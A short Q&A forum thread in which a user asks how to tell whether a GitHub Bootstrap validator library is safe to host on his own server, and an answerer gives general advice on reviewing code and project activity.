How do I tell if code in a GitHub library is safe?

While looking for a way to tell if 2 fields match for password verification, I found this Bootstrap framework on Github.

https://github.com/1000hz/bootstrap-validator

It's working well when I link to it, except that it runs slow.  I'd like to copy the source code to my webhost, and run it from there, but how do I tell if it's safe?  I don't want to compromise my server.

If anyone is using a bootstrap framework for password matches, that they know is safe, that might help, too.

Thanks,

Steve
LVL 2
stkoontzAsked:
Who is Participating?

Improve company productivity with a Business Account.Sign Up

x
 
Dillyn BarberConnect With a Mentor CIOCommented:
Best way is to analyze the code yourself and look for any back doors. Also check how many stars it has, how active it is, what issues are reported, etc. The best thing about github is you and millions of other people can view the entire source code to see what it's all about. In my opinion this looks safe, especially since it's only JS and from what I tell it only does what it says it does, I don't see any XSS attempts. If it seems slow it might be the CDN, or your connection to the CDN.
0
 
stkoontzAuthor Commented:
Thanks for the help!

Steve
0
Question has a verified solution.

Are you are experiencing a similar issue? Get a personalized answer when you ask a related question.

Have a better answer? Share it in a comment.

All Courses

From novice to tech pro — start learning today.